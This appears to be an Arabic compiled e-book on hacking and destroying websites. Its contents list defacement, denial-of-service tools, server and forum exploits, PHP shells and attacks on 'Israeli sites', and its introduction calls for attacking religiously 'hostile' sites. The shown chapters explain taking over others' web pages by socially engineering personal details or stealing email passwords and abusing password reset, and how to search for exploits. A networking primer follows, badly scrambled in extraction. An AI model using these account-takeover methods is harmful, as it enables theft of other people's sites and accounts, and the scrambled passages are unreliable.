‫لمحتويات‬

‫‪.1‬‬
‫‪.2‬‬
‫‪.3‬‬
‫‪.4‬‬
‫‪.5‬‬
‫‪.6‬‬
‫‪.7‬‬
‫‪.8‬‬
‫‪.9‬‬
‫‪.10‬‬
‫‪.11‬‬
‫‪.12‬‬
‫‪.13‬‬
‫‪.14‬‬
‫‪.15‬‬
‫‪.16‬‬
‫‪.17‬‬
‫‪.18‬‬
‫‪.19‬‬
‫‪.1‬‬
‫‪.2‬‬
‫‪.3‬‬
‫‪.4‬‬
‫‪.5‬‬
‫‪.6‬‬

‫‪.7‬‬
‫‪.8‬‬
‫‪.9‬‬
‫‪.10‬‬
‫‪.11‬‬

‫‪.20‬‬
‫‪.21‬‬
‫‪.22‬‬
‫‪.23‬‬
‫‪.24‬‬
‫‪.25‬‬
‫‪.26‬‬
‫‪.27‬‬
‫‪.28‬‬
‫‪.29‬‬
‫‪.30‬‬
‫‪.31‬‬
‫‪.32‬‬
‫‪.33‬‬
‫‪.34‬‬
‫‪.35‬‬
‫‪.36‬‬
‫‪.37‬‬

‫المقدمة‪.‬‬
‫الفهرس‪.‬‬
‫مقدمة عامة عن الهاكر‪.‬‬
‫كيفية البحث في النترنت‪.‬‬
‫مفاهيم خاصة بشبكات النترنت )الجزء الول(‪.‬‬
‫مفاهيم خاصة بشبكات النترنت )الجزء الثاني(‪.‬‬
‫المن عبر النترنت‪.‬‬
‫أمن الشبكات‪.‬‬
‫مصطلحات مهمة للمبتدئين في اختراق المواقع‪.‬‬
‫اختراق المواقع للمبتدئين‪.‬‬
‫الختراق ببرنامج ‪Webcrack.‬‬
‫الختراق ببرنامج ‪MungaBunga.‬‬
‫برنامج تدمير المواقع ‪.WinSmurf‬‬
‫شرح برنامج ‪ Evil Ping‬لتدمير المواقع‪.‬‬
‫برنامج الدرة لتدمير المواقع‪.‬‬
‫تدمير المواقع بدون برامج‪.‬‬
‫التلنت‪.‬‬
‫معلومات عن ‪.DNS‬‬
‫معلومات عن ‪.Routing in the Internet‬‬
‫‪.NETBIOS‬‬
‫بروتوكول خدمة ‪.Finger‬‬
‫‪ Net‬شرح مختصر لدارة الشبكة بإستخدام المر‪.‬‬
‫شرح الـ‪secure shell.‬‬
‫شرح معنى الـ ‪Buffer Overflows.‬‬
‫الـ ‪ CGI‬وعلقتها بالنترنت‪.‬‬
‫كيف تحمي نفسك وتخفي أفعالك؟!‪.‬‬
‫كيف تبقى مجهول الهوية في النت )الجزء الول(؟؟‪.‬‬
‫كيف تبقى مجهول الهوية في النت )الجزء الثاني(؟؟‪.‬‬
‫برنامج ‪ HTTP Port‬الذي يجعلك تتصفح النت متخفيا!ً!‪.‬‬
‫شرح برنامج ‪NeoTrace.‬‬
‫كيفية القيام بجمع المعلومات عن موقع أو شبكة‪.‬‬
‫برنامج عمران سكان للبحث عن الثغرات‪.‬‬
‫الختراق عن طريق اليونيكود )الجزء الول(‪.‬‬
‫الختراق عن طريق اليونيكود )الجزء الثاني(‪.‬‬
‫معلومات عامة عن كيفية الستفادة من ثغرات اليونيكود‪.‬‬
‫الدليل الكامل لختراق سيرفر ‪.IIS‬‬
‫دراسة مفصلة وبعمق في الـ ‪UniCode.‬‬
‫تدريب على عملية الختراق بواسطة اليونيكود‪.‬‬
‫شرح مفصل لكيفية اختراق المواقع المجانية‪.‬‬
‫درس مفصل عن الكوكيز‪.‬‬
‫شرح برنامج السطورة ‪God Will‬في تلغيم الصفحات‪.‬‬
‫وداعًا للبرنامج السطورة ومرحبا ببرنامج ‪.NOOP4‬‬
‫معلومات مهمة عن المواقع التي تدعم الفرونت بيج‪.‬‬
‫اختراق المواقع التي تدعم الفرونت بيج‪.‬‬
‫الختراق العشوائي‪.‬‬
‫الطريقة الصحيحة والمثلى في اختراق المواقع‪.‬‬
‫نبذه يسيرة ومبسطة عن كيفية اختراق المواقع‪.‬‬
‫)>س&ج<( في اختراق المواقع للمبتدئين‪.‬‬

‫‪1‬‬

‫‪.38‬‬
‫‪.39‬‬
‫‪.40‬‬
‫‪.41‬‬
‫‪.42‬‬
‫‪.43‬‬
‫‪.44‬‬
‫‪.45‬‬
‫‪.46‬‬
‫‪.47‬‬
‫‪.48‬‬
‫‪.49‬‬
‫‪.50‬‬
‫‪.51‬‬
‫‪.52‬‬
‫‪.53‬‬
‫‪.54‬‬
‫‪.55‬‬
‫‪.56‬‬
‫‪.57‬‬
‫‪.58‬‬
‫‪.59‬‬
‫‪.60‬‬
‫‪.61‬‬
‫‪.62‬‬
‫‪.63‬‬
‫‪.64‬‬
‫‪.65‬‬
‫‪.66‬‬
‫‪.67‬‬
‫‪.68‬‬
‫‪.69‬‬
‫‪.70‬‬
‫‪.71‬‬
‫‪.72‬‬
‫‪.73‬‬
‫‪.74‬‬
‫‪.75‬‬
‫‪.76‬‬
‫‪.77‬‬

‫برنامج ‪ CgiScaner‬للبحث عن الثغرات‪.‬‬
‫شرح برنامج سوبر سكان لمعرفة المنافذ المفتوحة في المواقع‪.‬‬
‫شرح برنامج ‪ Shadow Scan Security‬لتحليل الموقع‪.‬‬
‫اماكن وجود ملف الباسورد في أنظمة التشغيل‪.‬‬
‫اختراق الموقع )الجزء الول(‪.‬‬
‫اختراق المواقع )الجزء الثاني(‪.‬‬
‫اختراق المواقع )الجزء الثالث(‪.‬‬
‫درس في اختراق المواقع )متوسط(‪.‬‬
‫شرح ملف ‪.htaccess‬‬
‫نظام نقل الملفات ‪FTP.‬‬
‫الختراق عن طريق ‪FTP.‬‬
‫اختراق الـ ‪.SQL‬‬
‫درس مفصل عن الـ‪SQL.‬‬
‫درس لحتراف الهاك في اختراق المواقع‪.‬‬
‫استغلل لينكس في اختراق المواقع‪.‬‬
‫درس اخر في اختراق المواقع عن طريق لينكس‪.‬‬
‫شرح مفصل من اللف إلى الياء في احتراف اختراق المواقع عن طريق لينكس‪.‬‬
‫درس عن الـ ‪) PHP Shell‬الجزء الول(‪.‬‬
‫درس عن الـ ‪) PHP Shell‬الجزء الثاني(‪.‬‬
‫درس عن الـ ‪) PHP Shell‬الجزء الثالث(‪.‬‬
‫شرح أداة ‪.anmap‬‬
‫طريقة لقتحام السيرفرات بدون ثغرات‪.‬‬
‫‪.Cross Site Scripting‬‬
‫كود تدمير سجل الزوار‪.‬‬
‫وضع فايروس في صفحة‪.‬‬
‫الثغرااات‪.‬‬
‫شرح شبه مفصل عن الثغرات‪.‬‬
‫كيف تستخدم الثغرات‪.‬‬
‫تمتع بإختراق المواقع السرائيلية مع هذه الثغرة‪.‬‬
‫ثغرة نيوك‪.‬‬
‫ثغرة ‪.Chunked‬‬
‫حماية المنتديات‪.‬‬
‫اختراق المنتديات من نوع ‪.vBulletin2,2,0‬‬
‫درس مفصل عن كيفية اختراق المنتديات وطرق حمايتها‪.‬‬
‫ثغرة في منتديات ‪.vBulletin 2,2,9‬‬
‫اختراق منتديات ‪.phpbb 2.0.0‬‬
‫ثغرة في ‪. php nuke‬‬
‫أفضل المنتديات والمواقع العربية للهاك‪.‬‬
‫أفضل مواقع المن والهاك النجليزية‪.‬‬
‫الخاتمة‪.‬‬

‫‪2‬‬

‫بسم الله الرحمن الرحيم‬
‫الحمد لله رب العالمين الرحمن الرحيم والصلة والسلم على أشرف‬
‫النبياء‬
‫والمرسلين نبينا محمد عليه أفضل الصلة وأتم التسليم‪،‬‬
‫أما بعد‪...‬‬
‫ارجوا من العلي القدير أن يوفقني في كتابة هذا الكتاب الذي سيكون‬
‫مرجعا ً لخواني وأخواتي المسلمين‪ ،‬ففي هذا الكتاب سأقوم بنقل كل ما‬
‫كتب في اختراق المواقع وتدميرها عن أخواني المسلمين من كيفية‬
‫الختراق بالبرامج وبغيرها للمواقع المعادية لديننا الحنيف‪،،،‬‬
‫وارجوا من القراء الدعاء في ظهر الغيب لجامع هذا الكتاب‪.‬‬
‫ملحظة‪ :‬مواضيع هذا الكتاب ليس من تأليفي إنما هي نقل ً عن اخواني‬
‫المسلمين‪.‬‬
‫اقرأ هذا اول ً قبل البدء بقراءة مواضيع هذا الكتاب"اقسم بالله العلي‬
‫العظيم‬
‫الذي رفع السماء بل عمد أل اقوم بتطبيق ما في هذا الكتاب من طرق‬
‫على مواقع اخواني المسلمين وأن انفعهم قدر ما استطيع"‬
‫والله الموفق‪،،،‬‬

‫‪3‬‬

‫"من هم الهاكر "‬
‫الهكرز هم اشخاص مخترقون لجهزة الغير بمساعدة احدى برامج الختراق المشهورة إعتماًد على برامج‬
‫‪.‬مساندة تسهل عملية التصال بين الحاسبين تسمى بالباتش اوالسيرفر‬

‫كيف يتم اختراق مواقع النترنت؟؟‬‫هذا السؤال الذي دفع الكثيرين الي البحث والبحار في عالم النت‬
‫هناك انواع من الصفحات والسرفرات التي توفر مواقع مجانية‬
‫النوع الول‬
‫سيرفرات تحتفظ ببياناتك واذا نسيت او لم تتذكر باسوورد موقعك فانها سوف تطلب منك بياناتك الشخصية‬
‫السرية التي ل يعلمها ال انت مثل‬
‫اسمك الحقيقي الكامل‬
‫عمرك وميلدك‬
‫من اي بلد انت‬
‫وتختلف الدقة من سيرفر الي سيرفر آخر‬
‫النوع الثاني‬
‫سيرفرات تحتفظ ببياناتك واذا اضعت الباسوورد او نسيته فانها تطلب منك فقط الضغط علي ايكون مكتوب‬
‫عليه‬
‫))نسيت الباسوورد((‬
‫ومن ثم يرسلون الباسوورد الي اليميل الخاص بك‬
‫‪...................................................................‬‬
‫هذا النوع يسهل اختراقه اذا عرفت بيانات الشخص واستطعت التحدث معه بشتي الطرق وباسلوب لبق وما‬
‫ان تعرف بياناته‬
‫الشخصية حتي يمكنك ان تذهب الي صفحته الخاصه والضغط علي ايكون انك نسيت الباسوورد وادخال‬
‫البايانات الخاصة‬
‫‪ ...‬ومن ثم تغيير الباسوورد‬
‫وتغيير بيانات صاحب الصفحة الخاصة والسرية‬
‫‪..........................‬‬
‫النوع الثاني‬
‫هذا النوع مهما حاولت سرقة الباسوورد فانك لتستطيع ان تمتلك الصفحة لمدة طويلة لن الشركة سوف‬
‫ترسل اليه الباسوورد‬
‫‪ ..‬الجديد ‪ ..‬ومن هنا سيعرف الباسوورد ورقمه الجديد‬
‫!!! وسيتم اعادة ملكيته الي الصفحة او الموقع مره أخري‬
‫(( اذا كيف الحل ؟؟‬
‫‪ ..‬الحل هو‬
‫ان تعرف باسوورد اليميل الخاص به وحين تعرف الباسوورد سيمكنك الذهاب الي الشركة وكتابة انك نسيت‬
‫الباسوورد للموقع‬
‫‪ ..‬فسيتم اخطارك علي اليميل الذي سرقته ‪ ..‬بالباسوورد للموقع‬
‫‪.‬ومن هنا يمكنك سرقتة وملكيته وانت بسلم‬
‫‪،،،‬انتهى‬

‫‪4‬‬

‫"كيفية البحث في النترنت"‬

‫>ةةةةة ةة ةةةةةةة ةةةة ةةةةة ةةةةةةةةة <‬
‫> ةةةةةة‪ :‬ةةةة ةةةة <‬
‫كيفية البحث في النترنت ؟‬
‫عندما نسمع عن برنامج ما او عن مشكلة ما او اي شيء في النترنت ونريد البحث عنها كيف يتم ذلك ؟؟‬
‫غالبا نجد ان الشباب ل يقدر ان يقوم بالبحث في منتدى فما بالك بمسئله تريد البحث عنها في النترنت ؟ وقد‬
‫تجده يبحث ولكن ل يحصل بنتيجه والخطأ ليس في البحث‬
‫بل في طريقة البحث‬
‫صنعت محركات البحث حتى تساعدك في الوصول الى ما تريد باقصر وقت ممكن ولكن عليك ان تعلم ان‬
‫محركات البحث لكل منها عمل مع العلم انها عامه ولكن‬
‫ما هي النتائج ؟؟‬
‫بالنسبه مثل للجوجل انا اعتبره المحرك الذكي فهو يعرف ماذا كتبت فلذلك يعطيك النتائج الولى وهي غالبا‬
‫التي تريدها‬
‫بالنسبه للياهو هو ايضا ذكي ولكن ذكائه تجاري بحت حيث انه يقدم لك المواقع التجاريه التي تقدم ما تريد‬
‫والتي يتعامل معها المحرك ثم المواقع التجاريه التي ل يتعامل‬
‫معها المحرك ثم المواقع العامه وهي ما ترده انت احيانا‬
‫اعتقد ان المسئله وضحت‬
‫يا اخوان انا ابغى ابحث عن برنامج ما مثل يجب علي ان اخطط للبحث قبل ان اذهب الى المنتديات واسئل‬
‫لزم انت تتعلم كيف تبحث‬
‫وش الفرق بينك وبين النسان اللي هيجيبلك المعلومه من المنتدى ؟ هل يملك ريشه على دماغه ؟؟؟ ل اعتقد‬
‫ذلك‬
‫هل النترنت لديه سريعه للغايه وانت بطئيه للغايه ؟ ايضا ل اعتقد ذلك مع العلم ان السرعات العاليه اثبتت‬
‫فشلها بالنسبه لبعض الشخاص‬
‫التي ل تعرف كيف توظف عقولها‬
‫كنت مره في حديث مع صديق لي بدوله عربيه في الخليج وكان يحدثني بصراحه ويقول لي وال يا اخ بلك‬
‫انا الن لي سنه كامله على النترنت‬
‫غير محدد بباندويث وبسرعة ‪ 256‬ول اعرف من برامج الختراق غير الهاك اتاك ‪ ISDN‬مع خط‬
‫فعل انا تحطمت سنه كامله ومعك القوه الضاربه هذه ول تعرف غير الهاك اتاك ؟ قلتلله انت اكيد وقتك ما بين‬
‫مواقع الغاني والفلم والداون لود لها والشات قال ايوال هذا هو انا‬
‫وبذلك فعل ايقنت ان السرعه ليست كل شيء‬
‫‪.‬اهم شي عقلية من يملك السرعه فالسلح الذي ل تستطيع استخدامه ‪ -‬ل ينفع ‪ - (:‬ا هـ‬
‫‪ :‬الن سنقوم بشرح كيفية التخطيط للبحث‬
‫طريقه بسيطه جدا وهي عبر تقسيم المواقع‬
‫مواقع تجاريه‬
‫‪5‬‬

‫)) مواقع برامج )) ويندوز ‪ -‬ليونكس‬
‫مواقع ملتيميديا‬
‫مواقع سياسيه واخباريه‬
‫مواقع هاك‬
‫مواقع كراك‬
‫مواقع سكيوريتي‬
‫مواقع هاردوير‬
‫منتديات‬
‫)) محرك بحث جوجل )) هذا لوحده عالم‬
‫مواقع ‪ .....‬الخ‬
‫الن لنأخذ ما نبحث عنه‬
‫مثل برنامج ؟ بسيطه جدا ؟ وش يخليني اروح ابحث مثل في الياهو ؟؟؟ وش يخليني ابحث بمحرك عام ؟؟؟؟‬
‫او حتى وش يخليني اروح ابحث بالقوقل ؟؟؟‬
‫خلص بما انه برنامج انطلق فورا الى مواقع البرامج امثال زد دي نت ‪ -‬ويب اتاك ‪ -‬داون لود ‪ -‬وغيرها‬
‫وبالنسبه لليونكس فهناك موقع انا اعتبره انه اقوى من موقع داون لود في برامجه للويندوز‬
‫)) وهو موقع فريش ميت )) اخر الموضوع ساضع كل تلك المواقع كمرجع‬
‫بعد ان بحثت ولم اجد البرنامج ماذا افعل ؟ هل انتهى العمل ؟ ل لم ينتهي بعد اذهب الى الجوجل وابحث عن‬
‫ما تريد وابدا بقرائه النوتس الذي يخبرك ماذا تحوي هذه الصفحه‬
‫واذا وجدت ما تريد ادخل اليها‬
‫لم تجد ؟؟ )) ما اعتقد انك ما هتلقي اللي تدور عليه انا عمري ما سويت هالطريقه ال واجد ما اريد (( ولكن‬
‫لنفرض انك لم تجد ؟ ماذا ستفعل ؟ اذهب الى المنتديات وابحث‬
‫قبل ان تسأل واذالم تجد وقتها بامكانك السوال بالمنتدى‬
‫هذه نقطه نقطة اخرى مثل انت منت عارف اللي انت تبحث عنه بالظبط‬
‫مثل انا ادور على ثغره عارف نوعها ولكن ماني عارف موجوده في وش‬
‫‪ CSS‬او ‪ XSS‬واللي اختصارها ‪ Cross Site Scripte‬ولتكن مثل ثغرات الـ‬
‫انا ما ادور على الثغره ادور على اكسبلويت مثل وش اسوي ؟؟؟‬
‫هيطلعللك كل شي عنها ابدا ابحث فيما تريد وفي نفس ‪ XSS‬اذهب اول لمواقع السكيوريتي ابحث عن كلمة‬
‫الوقت اذهب الى الجوجل مثل وابحث عن‬
‫ولكن هذا ل يكفي انا ابغى شي بعينه والجوجل مو زي مواقع السكيوريتي هتجيب شي بسيط ل ‪XSS‬‬
‫) ‪ ( +‬الجوجل هيجيب بلوي ولذلك علي بتحديد البحث عبر علمه‬
‫‪ :‬يعني انا ادور بجز وادور اكسبلويت وادور باسم الثغره فعلي ان اكتب‬
‫‪XSS+BUG+EXPLOIT‬‬
‫‪ :‬هاكتب ‪ IIS‬مثل ادور ثغرات‬
‫‪IIS+exploit+bug‬‬
‫خليه يطلعللك كل شي عن المسئله اللي تبحث عنها اهم شي انه يجيبلك مواضيع في ما تبحث عنه‬
‫ومن ثم المنتديات ومن ثم الكتابه عن ما تريد اذا لم تجد‬
‫اهم شي بالنقطه التخطيط للبحث‬
‫عن ماذا ابحث ؟ موضوع يتعلق ببرنامج ؟ ويندوز وال ليونكس ؟ رتب المواقع ‪ :‬ابدا البحث‬
‫عن ماذا ابحث ؟ موضوع يتعلق بالشوبرينج ؟ رتب المواقع ‪ :‬ابدا البحث‬

‫‪6‬‬

http://www.securityfocus.com/ ‫ مواقع هاردوير‬: http://nvidia.com/ ‫ )) عبر برامجها مثثل الكازا او المورفيس او اوديو جالكسي او وين ام اس‬: ‫ )) مواقع ملتيميديا‬kazaa WinMX ‫الكثر شهره‬ ‫ مواقع سياسيه واخباريه‬: http://news.google.http://www.com/ .uk/hi/arabic/news http://arabic.lycos.http://www.com/ http://www.http://www.altavista.com/ ‫انتهى‬،،، 7 .asus.com/ .ussrback.net/ ‫ مواقع سكيوريتي‬: http://www.com/ .nu/ http://www.http://www.amdmb.com/ .securiteam.com/ .cnn.ntbugtraq.online.aljazeera.‫وهكذا‬ ‫الن ساضع لكم مجموعه من المواقع تفيدكم جدا‬ ‫ الملك جوجل‬: http://www.bbc.nz/ .co.http://drivers.yahoo.http://www.com/ .com/ .lycos.com/ .http://intel.com/ http://www.http://www.ntsecurity.com/ ‫ محركات بحث عاديه ومتقدمه‬: http://www.com/ .net.http://hotbot.ntsecurity.

‬فالرقم الموجود على‬ ‫بطاقتك يستحيل تكراره لي مواطن آخر في نفس البلد‪.winipcfg‬‬ ‫توزيع أرقام الـ ‪IP‬‬ ‫هل سبق وأن تساءلت لماذا كان رقم ‪ IP‬الخاص بك هو ‪ 212.‬‬ ‫تشرف منظمة ‪ (IANA(Internet Assigned Numbers Authority‬على توزيع أرقام ‪ IP‬على‬ ‫مستوى العالم‪ ،‬حيث أنها تقوم بالشراف على ثلث منظمات فرعية وتكون كل منظمة مسؤولة عن جزء‬ ‫معين من العالم وهذه المنظمات الفرعية هي‪:‬‬ ‫‪ -1‬منظمة ‪ (ARIN (American Registry for Internet Numbers‬وتشرف على أمريكا‬ ‫الشمالية والجنوبية والمناطق الكاريبية وأجزاء من افريقيا‬ ‫‪ -2‬منظمة ‪ (RIPE (Réseaux IP Européens‬وتشرف على منطقة أوروبا والشرق الوسط وأجزاء‬ ‫من افريقيا‬ ‫‪ -3‬منظمة ‪ (APNIC (Asia Pasific Network Information Center‬وتشرف على آسيا‬ ‫تقوم كل منظمة بالشراف على توزيع ارقام ‪ IP‬للدول الواقعة تحت مجال اشرافها‪ .winipcfg‬إذا كنت تستخدم وندوز باعتماد اللغة العربية اختر‬ ‫"ابدأ" ثم "تشغيل" ثم اكتب ‪.‬‬ ‫من هم الهاكرز ؟ وما هي أهدافهم ؟ وكيف نتقي شرهم ؟ أسئلة ل بد أنها دارت في رأس أكثر المستخدمين‬ ‫في مختلف أنحاء العالم‪ ،‬ول سيما أولئك المستخدمين الذين طالهم أذى الهاكرز سواء بسرقة معلومات من‬ ‫أجهزتهم أو إتلف محتوياتها أو في أهون الحوال إخافتهم وإرعابهم‪.‬‬ ‫الهاكر الطيب سلسلة من الحلقات نقدمها لك أخي القارئ‪ ،‬كوسيلة تعليمية لكل المستخدمين على مختلف‬ ‫مستوياتهم لكي يتعلموا كيف يتقون شرور هؤلء الهاكرز ولكي يعرفوا الحيل التي يستخدمها الهاكرز للحاق‬ ‫الذى بهم‪ .33.1‬وليس ‪ ،24.IP‬‬ ‫في حالة الشبكات الدائمة والتي يكون الجهاز مرتبطا بالشبكة بواسطة أسلك الشبكة‪ ،‬يكون هذا الرقم ثابتا‬ ‫للجهاز دائما‪ .66.‬‬ ‫رقم ‪IP‬‬ ‫ما الغرض من بطاقة الحوال المدنية التي تحملها ؟ انها مجرد وسيلة لتمييزك وتعريفك‪ .‬ولكن على الرغم من كثرة الشياء المفيدة في النترنت إل أنه لبد من وجود ما يكدر‬ ‫الصفو‪ .‬مالم يتم نزع الجهاز من الشبكة بشكل دائم‪ ،‬ولكن في حالة التصال الهاتفي فإن عنوان الجهاز‬ ‫يتغير كلما اتصلت على موفر الخدمة الذي تدخل للشبكة من خلله‪.‬‬ ‫نفس المبدأ ينطبق في مجال الحاسب اللي من ناحية الشبكات‪ ،‬فلتمييز الجهزة المرتبطة بشبكة واحدة يعطى‬ ‫لكل جهاز رقم مميز يستحيل تكراره في أي جهاز آخر مرتبط بنفس الشبكة وهذا الرقم هو ما يسمى بعنوان‬ ‫الجهاز أو ‪.‬باختصار ستكون أخي القارئ أحد هؤلء الهاكرز‪ ،‬ولكن لن تكون مثلهم في الشر‪.‬هذا الكدر نسميه "الهاكرز" أو من يسمون بالمخترقين في بعض الحيان‪.‬‬ ‫مقدمة‪:‬‬ ‫هذه الحلقة ستكون مخصصة لتقديم بعض المهارات والمعلومات الساسية التي يجب أن يعرفها كل من يريد‬ ‫اتقاء شر الهاكرز‪ ،‬وهي بعض المصطلحات والمفاهيم الخاصة شبكات الحاسب اللي‪.‬‬ ‫لعلك الن تتساءل كيف أعرف عنوان جهازي عندما أتصل بالنترنت؟ المر سهل جدا من شريط المهام في‬ ‫الوندوز انقر على ‪ Start‬ثم ‪ run‬ثم أدخل ‪ .‬ويوجد لكل منظمة قاعدة‬ ‫‪8‬‬ .5.‫")مفاهيم خاصة بشبكات النترنت )الجزء الول"‬ ‫>ةةةةة <‬ ‫> ةةةةةة‪ :‬ةةةة ةةةةةة <‬ ‫النترنت عالم مليء بالفائدة‪ ،‬مليء بالمتعة‪ ،‬عالم يجد فيه كل إنسان ما يهمه‪ ،‬باختلف مجالت الهتمام‬ ‫واختلف الشخاص‪ .3‬وهل سبق‬ ‫وأنت تساءلت لماذا تبدأ ارقام الـ ‪ IP‬في السعودية بالرقم ‪ 212‬وليس بأي رقم آخر ؟ في الحقيقة إن أرقام‬ ‫‪ IP‬ليتم توزيعها بطريقة عشوائية أو بطريقة "كٌل يأخذ ما يريد" بل بالعكس يوجد هناك منظمات تشرف‬ ‫على توزيع أرقام ‪ IP‬على الدول والمؤسسات داخل الدول بحيث يتم معرفة الجهة عند معرفة رقم ‪ IP‬الذي‬ ‫تمتلكه‪..‬بل ستكون‬ ‫الهاكر الطيب‪.40.

‬‬ ‫عائلة الـ ‪IP‬‬ ‫من المعروف أن رقم الـ ‪ IP‬يتكون من أربعة أقسام كالتالي ‪ 10.net/db/whois.34‬والجهاز الذي يحمل رقم ‪IP‬‬ ‫‪ 212.26.75‬في المربع الموجود في الصفحة ومن ثم انقر الزر ‪ search‬وستحصل على‬ ‫جميع المعلومات المخزنة عن مزود الخدمة‪.‫بيانات تمكنك من معرفة صاحب رقم ‪ IP‬معين وتسمى هذه الخدمة بخدمة ‪ whois‬حيث تقوم بإدخال رقم ‪IP‬‬ ‫التابع لمنظمة معينة وستحصل على معلومات عن من يمتلك هذا ‪ IP‬فمثل لمعرفة صاحب رقم ‪ IP‬معين في‬ ‫المملكة العربية السعودية قم بالذهاب للموقع ‪ http://www.‬‬ ‫فكل تطبيق لديه منفذ معين يستخدمه لرسال واستقبال بياناته وهذا نوع من التنظيم فمثل خدمة الويب غالبا‬ ‫ما تكون على المنفذ ‪ 80‬وخدمة الملفات تكون على المنفذ ‪ 21‬وبرنامج النت ميتنغ يكون على عدة منافذ‬ ‫منها ‪ 1720‬وكل تطبيق يكون له منفذ معين‪ .75.1‬كل قسم من هذه القسام يمكن أن‬ ‫تكون له قيمة تتراوح بين ‪ 0‬و ‪) 255‬مع وجود بعض الستثناءات التي ليس هذا المجال لذكرها( الشيء‬ ‫الذي يجب معرفته أن أول ثلثة أقسام من الجهة اليسرى من رقم ‪ IP‬غالبا ما تكون محجوزة لمزود خدمة‬ ‫معين بحيث تكون جميع أرقام ال ‪ IP‬التي يتشابه بها أول ثلثة أقسام من الجهة اليسرى تنتمي لنفس مزود‬ ‫الخدمة‪ .‬فمثل الجهاز الذي يحمل رقم ‪ IP 212.26.‬‬ ‫المنفذ ‪Port‬‬ ‫ماهو المنفذ ؟ تخيل منزل فيه العديد من البواب وأن كل واحد من هذه البواب مخصص لخدمة معينة ‪ ،‬فباب‬ ‫لستقبال الضيوف وباب آخر للخدم وباب آخر لدخول الخدمات‪.ripe.net/db/whois.ripe.26.‬فبالتالي عندما تأتي بيانات للجهاز على منفذ معين فسوف‬ ‫يعرف الجهاز لي تطبيق تنتمي هذه البيانات ويقوم بإرسالها لهذا التطبيق الذي يقوم بمعالجتها‪.‬‬ ‫‪ DNS‬ماهو ؟‬ ‫أنت بالطبع تتذكر أسماء أصدقائك ول تواجه أي مشكلة في استرجاعها من ذاكرتك ولكن ماذا عن أرقام‬ ‫‪9‬‬ .75.‬‬ ‫ولمعرفة مزود الخدمة بواسطة رقم ‪ IP‬الثلثي )أي رقم ‪ IP‬بدون آخر رقم من الجهة اليمنى ( يمكنك زيارة‬ ‫موقع المنظمة المشرفة على البلد الذي ينتمي له رقم ‪ IP‬واستخدام خدمة ‪ whois‬الخاصة بها‪ .‬نفس المبدأ ينطبق على الحاسب اللي فالجهاز‬ ‫يحتوي على العديد من الخدمات مثل خادم الويب ‪ web server‬وخادم الملفات ‪ ftp server‬وغيرها‪.‬فمثل‪،‬‬ ‫لمعرفة مزود الخدمة في المثال أعله قم بالذهاب للموقع ‪http://www.10.html‬‬ ‫وأدخل الرقم ‪ 212.10.html‬وأدخل رقم‬ ‫‪ IP‬وستحصل على معلومات متكاملة عن صاحب هذا الرقم‪.201‬غالبا ما ينتميان لنفس مزود الخدمة‪.

10‬بدل من ‪ www.‬من هذا المبدأ جاءت فكرة‬ ‫‪ .111.cnn.145.‫هواتفهم ؟كم رقما تحفظ منها ؟ اثنان ؟ عشرة؟ مهما كانت ذاكرتك جيدة فلن تستطيع حفظ أرقام هواتفهم كلها‬ ‫وإن فعلت فتبقى الحقيقة أن نسيان الرقام أكثر سهولة من نسيان السماء‪ .‬‬ ‫هذا شيء ضروري فلكي ترسل رسالة إلى شخص معين فيجب أن تعرف عنوانه ويجب هو أيضا أن يعرف‬ ‫عنوانك لكي يقوم بالرد عليك‪ .server‬‬ ‫هناك أمر في نظام الدوس يسمح لك بمعرفة جميع الجهزة المتصلة بجهازك ) أو التي يقوم جهازك بارسال‬ ‫واستقبال البيانات منها( ومعرفة المتفذ )‪ (port‬الذي تم عليه التصال) فائدة المنفذ هي تحديد التطبيق الذي‬ ‫تم التصال عليه( وهذا المر هو المر ‪ netstat‬ما عليك إل أن تقوم بتشغيل ‪ ms-dos prompt‬من‬ ‫قائمة برامج ‪ programs‬ومن ثم اكتب هذا المر وستحصل على قائمة بكل هذه الجهزة مع المنفذ الذي تم‬ ‫عليه التصال في كل الجهازين‪..‬اختصارا‪ ،‬يمكن القول بأن خادم السماء ‪ DNS‬ماهو ال جهاز يحتوي‬ ‫على قاعدة بيانات فيها اسماء الجهزة في النترنت وأرقام ‪ IP‬الخاصة بها‪.com‬ومن ثم لحظ‬ ‫خبراء الحاسب أن ذلك سيكون صعبا جدا ‪ .‬وهما‬ ‫كالتالي‪:‬‬ ‫‪ .‬‬ ‫فمثل لزيارة موقع ‪ CNN‬يجب أن تكتب ‪ 207.connection‬طبعا لكل اتصال يجب أن يكون هناك من يقوم بطلب التصال‬ ‫ويسمى عميل أو ‪ Client‬ويكون هناك أيضا من يتم التصال عليه ويسمى مزود ‪.‬وبعد إجراء التصال يتمكن الشخص من الدخول لي من الغرف الموجودة في‬ ‫المزود كما يمكنه أيضا انشاء الغرف الخاصة به‪ ،‬كما يمكنه أيضا القيام بالعديد من الوظائف التي ليس هذا‬ ‫المجال لذكرها‪.DNS‬حيث أنه في بداية استخدام النترنت كان من المفروض أن تحفظ عنوان الجهاز ‪ IP‬لكل موقع ‪.‬‬ ‫هناك استثناءان لهذا‬ ‫النظام‪ ،‬حيث يمكن لي‬ ‫شخص آخر في نظام‬ ‫المحادثة معرفة رقم ‪IP‬‬ ‫الكامل الخاص بك‪ .‬‬ ‫المحادثة )‪IRC) Internet Relay Chat‬‬ ‫طريقة عمل نظام المحادثة هي وجود مزود محادثة ‪ chat server‬ووجود برنامج محادثة ‪chat client‬‬ ‫في كل جهاز بحيث إذا أراد شخص الدخول للمحادثة يقوم بتشغيل برنامج المحادثة ‪ ،‬والذي بدوره يقوم‬ ‫بالتصال بمزود المحادثة‪ ...‬‬ ‫المر ‪netstat‬‬ ‫هل تعلم بأنه من المستحيل أن يكون هناك تخاطب بين جهازك وبين أي جهاز آخر في النترنت بدون أن‬ ‫يكون لدى كل من الجهازين رقم الـ ‪ IP‬الخاص بالجهاز الخر؟ وأقصد بالتخاطب هو نقل أي نوع من البيانات‪.‬‬ ‫قلنا في السابق أن كل جهاز يقوم جهازك بالتخاطب معه يعرف رقم الـ ‪ IP‬الخاص بك‪ ،‬ولكن يجب أن ل يفهم‬ ‫هذا الكلم بالشكل الخاطيء فمثل في نظام المحادثة ‪ IRC‬تقوم أنت بالتصال بمزود المحادثة ‪chat‬‬ ‫‪ server‬وكذلك الحال بالنسبة لجميع المستخدمين‪ ،‬بحيث يكون هذا المزود كالوسيط بينك وبين جميع‬ ‫الشخاص المتصلين به‪ ،‬فلكي تقوم بإرسال رسالة لشخص ما‪ ،‬يقوم برنامج المحادثة بإرسال الرسالة لمزود‬ ‫المحادثة والذي بدوره يقوم بإرسالها للشخص وبالتالي فإنه ل يوجد اتصال مباشر بينك وبين أي شخص 